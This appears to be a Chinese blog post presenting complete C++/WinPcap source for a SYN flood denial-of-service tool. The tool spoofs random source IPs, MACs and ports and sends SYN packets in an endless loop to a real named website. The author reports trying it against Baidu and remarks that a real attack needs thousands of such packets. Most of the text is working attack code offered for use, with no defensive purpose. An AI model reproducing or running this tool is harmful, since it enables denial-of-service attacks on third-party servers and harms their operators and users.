基于winpcap和syn的dos攻击,亲测

<span style="font-family: Arial, Helvetica, sans-serif; background-color: rgb(255, 255, 255);">网上这样的帖子很多,但有几个问题一直没解决。</span>

1、在计算TCP报头的校验和时应该还有伪报头,很多人都没有。

2、在封装以太网数据包时需要用到目的地址的mac地址,由于很多人是在虚拟机上测,目的mac也就知道,但事实上,对于真正的远端主机来说,我们只能获取它的IP地址,而mac地址是无法获取的。而事实上,这儿的目标mac应该写的是网关mac地址。

下面看我一步一步写syn攻击。

一、首先要清楚TCP/IP报头,清楚三次握手,这个别的地方将的很多。而syn flood攻击就是向服务器发送大量的syn请求包,让服务器保持这些连接而拒绝其他正常连接请求。

/*                       IP报文格式
	0            8           16                        32
	+------------+------------+-------------------------+
	| ver + hlen |  服务类型  |         总长度          |
	+------------+------------+----+--------------------+
	|           标识位        |flag|   分片偏移(13位)   |
	+------------+------------+----+--------------------+
	|  生存时间  | 高层协议号 |       首部校验和        |
	+------------+------------+-------------------------+
	|                   源 IP 地址                      |
	+---------------------------------------------------+
	|                  目的 IP 地址                     |
	+---------------------------------------------------+

*/

struct IP_HEADER
{
	byte versionAndHeader;
	byte serviceType;
	byte totalLen[2];
	byte seqNumber[2];
	byte flagAndFragPart[2];
	byte ttl;
	byte hiProtovolType;
	byte headerCheckSum[2];
	byte srcIpAddr[4];
	byte dstIpAddr[4];
};

/*
	                      TCP 报文
	0                       16                       32	
	+------------------------+-------------------------+
	|      源端口地址        |      目的端口地址       |
	+------------------------+-------------------------+
	|                      序列号                      |
	+--------------------------------------------------+
	|                      确认号                      |
	+------+--------+--------+-------------------------+
	|HLEN/4| 保留位 |控制位/6|         窗口尺寸        |
	+------+--------+--------+-------------------------+
	|         校验和         |         应急指针        |
	+------------------------+-------------------------+
*/

struct TCP_HEADER
{
	byte srcPort[2];
	byte dstPort[2];
	byte seqNumber[4];
	byte ackNumber[4];
	byte headLen;
	byte contrl;
	byte wndSize[2];
	byte checkSum[2];
	byte uragentPtr[2];
};
struct PSDTCP_HEADER //这是TCP的伪报头,在计算TCP的校验和时需要包含
{ 
    byte srcIpAddr[4];     //Source IP address; 32 bits
    byte dstIpAddr[4];     //Destination IP address; 32 bits 
    byte padding;          //padding
    byte protocol;         //Protocol; 8 bits
    byte tcpLen[2];        //TCP length; 16 bits
} ;

struct ETHERNET_HEADER //以太网帧头
{  
	byte dstMacAddr[6];
	byte srcMacAddr[6];
	byte ethernetType[2];
};

我还是直接贴代码吧


#include <stdio.h>
#include <stdlib.h>
#include <pcap.h>
#include <winsock2.h>
#include <conio.h>
#include <iostream>
#include <packet32.h>
#include <ntddndis.h>
#include <time.h>
#include <string>
#include <vector>

using namespace std;

#pragma comment(lib, "../common/lib/Packet.lib")
#pragma comment(lib, "../common/lib/wpcap.lib")
#pragma comment(lib, "ws2_32.lib")


/*                       IP报文格式
	0            8           16                        32
	+------------+------------+-------------------------+
	| ver + hlen |  服务类型  |         总长度          |
	+------------+------------+----+--------------------+
	|           标识位        |flag|   分片偏移(13位)   |
	+------------+------------+----+--------------------+
	|  生存时间  | 高层协议号 |       首部校验和        |
	+------------+------------+-------------------------+
	|                   源 IP 地址                      |
	+---------------------------------------------------+
	|                  目的 IP 地址                     |
	+---------------------------------------------------+

*/

struct IP_HEADER
{
	byte versionAndHeader;
	byte serviceType;
	byte totalLen[2];
	byte seqNumber[2];
	byte flagAndFragPart[2];
	byte ttl;
	byte hiProtovolType;
	byte headerCheckSum[2];
	byte srcIpAddr[4];
	byte dstIpAddr[4];
};

/*
	                      TCP 报文
	0                       16                       32	
	+------------------------+-------------------------+
	|      源端口地址        |      目的端口地址       |
	+------------------------+-------------------------+
	|                      序列号                      |
	+--------------------------------------------------+
	|                      确认号                      |
	+------+--------+--------+-------------------------+
	|HLEN/4| 保留位 |控制位/6|         窗口尺寸        |
	+------+--------+--------+-------------------------+
	|         校验和         |         应急指针        |
	+------------------------+-------------------------+
*/

struct TCP_HEADER
{
	byte srcPort[2];
	byte dstPort[2];
	byte seqNumber[4];
	byte ackNumber[4];
	byte headLen;
	byte contrl;
	byte wndSize[2];
	byte checkSum[2];
	byte uragentPtr[2];
};

struct PSDTCP_HEADER
{ 
    byte srcIpAddr[4];     //Source IP address; 32 bits
    byte dstIpAddr[4];     //Destination IP address; 32 bits 
    byte padding;          //padding
    byte protocol;         //Protocol; 8 bits
    byte tcpLen[2];        //TCP length; 16 bits
} ;

struct ETHERNET_HEADER
{  
	byte dstMacAddr[6];
	byte srcMacAddr[6];
	byte ethernetType[2];
};

struct DEVS_INFO
{
	char szDevName[512];
	char szDevsDescription[512];
};

int GetAllDevs( DEVS_INFO devsList[] )
{
	int nDevsNum = 0;
	pcap_if_t *alldevs;
	char errbuf[PCAP_ERRBUF_SIZE];
	if ( pcap_findalldevs(&alldevs,errbuf) == -1 )
	{
		return -1;
		printf("error in pcap_findalldevs_ex: %s\n",errbuf);
	}
	for ( pcap_if_t *d = alldevs; d != NULL; d = d->next )
	{
		strcpy( devsList[nDevsNum].szDevName, d->name );
		strcpy( devsList[nDevsNum].szDevsDescription, d->description );
		nDevsNum++;
	}
	pcap_freealldevs(alldevs);
	
	return nDevsNum;
}

int GetAdapterMacAddr( char *lpszAdapterName, unsigned char ucMacAddr[] )
{
	LPADAPTER lpAdapter = PacketOpenAdapter( lpszAdapterName );
	if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE))
	{
		return -1;
	}	

	PPACKET_OID_DATA oidData = ( PPACKET_OID_DATA )malloc(6 + sizeof(PACKET_OID_DATA));
	if ( NULL == oidData ) 
	{
		PacketCloseAdapter(lpAdapter);
		return -1;
	}

	oidData->Oid = OID_802_3_CURRENT_ADDRESS;
	oidData->Length = 6;
	memset(oidData->Data, 0, 6 );
	
	BOOLEAN  bStatus = PacketRequest(lpAdapter, FALSE, oidData);
	if ( bStatus )
	{
		for ( int i = 0; i < 6; ++i )
		{
			ucMacAddr[i] = (oidData->Data)[i];
		}
	}
	else
	{
		return -1;
		free( oidData );
	}
	free( oidData );
	PacketCloseAdapter( lpAdapter );
	return 0;
}


int GetIpByHost(const char *lpszHost, std::vector<std::string> &ipList )
{
	WSADATA wsadata;
	WSAStartup(MAKEWORD(2, 2),&wsadata);
	hostent *phost=gethostbyname( lpszHost );
	in_addr addr;
	char *p = phost->h_addr_list[0];
	for(int i = 1; NULL != p; i++)
	{
		memcpy(&addr.S_un.S_addr, p, phost->h_length);
		ipList.push_back( inet_ntoa( addr ));
		p = phost->h_addr_list[i];
	}
	return 0;
}

int GetGatewayMacAddr( byte macAddr[] )
{
	byte mac[] = {0x00, 0x00, 0x5e, 0x00, 0x01, 0x48};
	//00-00-5e-00-01-48
	memcpy( macAddr, mac, 6 );
	return 0;
}


unsigned short CheckSum(unsigned short packet[], int size )
{
	unsigned long cksum = 0;
    while (size > 1) 
    {
        cksum += *packet++;
        size -= sizeof(USHORT);
    }
    if (size) 
    {
        cksum += *(UCHAR*)packet;
    }
    cksum = (cksum >> 16) + (cksum & 0xFFFF);
    cksum += (cksum >>16);

    return (USHORT)(~cksum);
}

int EncodeSynPacket( byte packet[], const char *lpszSrcIpAddr, const char *lpszDstIpAddr, byte srcMacAddr[])
{
	TCP_HEADER tcpHeader;
	memset(&tcpHeader, 0, sizeof tcpHeader );
	*(unsigned short *)tcpHeader.srcPort = htons(9999);
	*(unsigned short *)tcpHeader.dstPort = htons(80);
	*(unsigned int *)tcpHeader.seqNumber = htonl(0xFFFF);
	*(unsigned int *)tcpHeader.ackNumber = htonl(0x00);
	tcpHeader.headLen = 5 << 4; 
	tcpHeader.contrl = 1 << 1;
	*(unsigned short *)tcpHeader.wndSize = htons(0xFFFF);
	
	IP_HEADER ipHeader;
	memset( &ipHeader, 0, sizeof ipHeader );
	unsigned char versionAndLen = 0x04;
	versionAndLen <<= 4;
	versionAndLen |= sizeof ipHeader / 4; //版本 + 头长度

	ipHeader.versionAndHeader = versionAndLen;
	*(unsigned short *)ipHeader.totalLen = htons( sizeof(IP_HEADER) + sizeof(TCP_HEADER) ); 

	ipHeader.ttl = 0xFF;
	ipHeader.hiProtovolType = 0x06;

	*(unsigned int *)(ipHeader.srcIpAddr) = inet_addr(lpszSrcIpAddr);
	*(unsigned int *)(ipHeader.dstIpAddr) = inet_addr(lpszDstIpAddr);
	//*(unsigned short *)(ipHeader.headerCheckSum) = CheckSum( (unsigned short *)&ipHeader, sizeof ipHeader );
	
	byte gatewayMac[] = {0x00, 0x00, 0x5e, 0x00, 0x01, 0x48};

	ETHERNET_HEADER ethHeader;
	memset(ðHeader, 0, sizeof ethHeader);
	memcpy(ethHeader.dstMacAddr, gatewayMac, 6);
	memcpy(ethHeader.srcMacAddr, srcMacAddr, 6);
	*(unsigned short *)ethHeader.ethernetType = htons(0x0800);

	//memset(packet, 0, sizeof packet);
	memcpy(packet, ðHeader, sizeof ethHeader);
	memcpy(packet + sizeof ethHeader, &ipHeader, sizeof ipHeader);
	memcpy(packet + sizeof ethHeader + sizeof ipHeader, &tcpHeader, sizeof tcpHeader);
	
	return (sizeof ethHeader + sizeof ipHeader + sizeof tcpHeader);
}

int main()
{
	system("mode con cols=110 lines=20");
	
	DEVS_INFO devsList[64];
	int nDevsNum = GetAllDevs( devsList );
	if ( nDevsNum < 1 )
	{
		printf("Get adapter infomation failed!");
		exit(0);
	}

	for ( int i = 0; i < nDevsNum; ++i )
	{
		printf("%d  %s\t%s\n", i+1, devsList[i].szDevName, devsList[i].szDevsDescription );
	}
	printf("Input your select adapter index: ");
	int selIndex = 0;
	scanf("%d", &selIndex);
	if ( selIndex < 0 || selIndex > nDevsNum+1 )
	{
		printf("Out of range!\nPress any key to exit...");
		getch();
		return 0;
	}

	char szError[PCAP_ERRBUF_SIZE];
	pcap_t *handle = pcap_open_live(devsList[selIndex-1].szDevName, 65536, 1, 1000, szError );
	if ( NULL == handle )
	{
		printf("Open adapter failed!\nPress any key to exit...");
		getch();
		return 0;
	}

	byte localMacAddr[6];
	memset(localMacAddr, 0, sizeof localMacAddr);
	if ( 0 != GetAdapterMacAddr(devsList[selIndex-1].szDevName, localMacAddr) )
	{
		printf("Get localhost mac addr failed!\nPress any key to exit...");
		getch();
		return 0;
	}

	std::vector<std::string> ipList;
	GetIpByHost("www.szbike.com", ipList);

	byte packet[1024];
	int size = EncodeSynPacket( packet, "0.0.0.0", ipList[0].c_str(), localMacAddr);
	
	//return 0;
	ETHERNET_HEADER *pEtherentHeader = (ETHERNET_HEADER *)packet;
	IP_HEADER *pIpHeader = ( IP_HEADER *)(packet + sizeof(ETHERNET_HEADER));
	TCP_HEADER *pTcpHeader = ( TCP_HEADER *)(packet + sizeof(ETHERNET_HEADER) + sizeof(IP_HEADER));

	//*srand(time(0));
	unsigned short srcPort = 0;//= rand() %0xFFFFFFFF;
	unsigned int srcIpAddr = 0;
	unsigned int baseIpAddr = ntohl(inet_addr("10.126.0.0"));

	byte psdPacket[128];
	memset(psdPacket, 0x00, sizeof psdPacket );
	PSDTCP_HEADER *psdHeader = (PSDTCP_HEADER *)psdPacket;

	*(unsigned int *)(psdHeader->dstIpAddr) = inet_addr(ipList[0].c_str());
	*(unsigned short *)(psdHeader->tcpLen)  = htons(sizeof(TCP_HEADER));	
	psdHeader->protocol = 0x06;
	psdHeader->padding  = 0x00;

	memcpy( psdPacket + sizeof(PSDTCP_HEADER), pTcpHeader, sizeof(TCP_HEADER));

	unsigned int seq = 0;
	srand( time(0) );
	while ( 1 )
	{
		for ( int i = 0; i < 6; ++i )
		{
			pEtherentHeader->srcMacAddr[i] = (byte)(rand() % (0xFF+1) );
		}

		seq = rand() % 0xFFFFFF;
		srcPort = rand() % 0xFFFF;
		srcIpAddr = baseIpAddr + rand() % 0xFFFF;

		*(unsigned int *)(pIpHeader->srcIpAddr) = htonl(srcIpAddr);
		*(unsigned short *)(pIpHeader->headerCheckSum) = 0x0000;
		*(unsigned short *)(pIpHeader->headerCheckSum) = CheckSum( ( unsigned short * )pIpHeader, sizeof (IP_HEADER));
		
		*(unsigned int *)(psdHeader->srcIpAddr) = htonl(srcIpAddr);
		*(unsigned int *)(psdHeader->srcIpAddr) = htonl(srcIpAddr);

		TCP_HEADER *psdTcpHeader = (TCP_HEADER *)(psdPacket + sizeof(PSDTCP_HEADER) );

		*(unsigned int *)(psdTcpHeader->seqNumber) = htonl(seq);
		*(unsigned int *)(pTcpHeader->seqNumber) = htonl(seq);//htonl(rand() % 0xFFFFFF );

		*(unsigned short *)(pTcpHeader->srcPort) = htons(srcPort);
		*(unsigned short *)(psdTcpHeader->srcPort) = htons(srcPort);

		*(unsigned short *)(pTcpHeader->checkSum) = 0x0000;
		*(unsigned short *)(pTcpHeader->checkSum) = CheckSum( (unsigned short *)psdPacket, sizeof(PSDTCP_HEADER) + sizeof(TCP_HEADER) );

		//system("pause");
		Sleep(0);
		pcap_sendpacket(handle, packet, size );
	}

	if ( NULL == handle )
	{
		printf("\nUnable to open the adapter. %s is not supported by WinPcap\n");
		return 0;
	}
	pcap_close(handle);	
	return 0;
}


这是对www.baidu.com的测试,可以看到,发出之后百度返回了syn+ack,这时如果我们不再继续,百度的服务器就会等一段时间,这就实现了一次攻击,当然了,真正的攻击需要成千上万个这样的数据包。

在测试的时候有时候收到syn+ack后,系统会自动发一个rest,开启windows防火墙可避免这种情况。


版权声明:本文为博主原创文章,未经博主允许不得转载。

你可能感兴趣的:(基于winpcap和syn的dos攻击,亲测)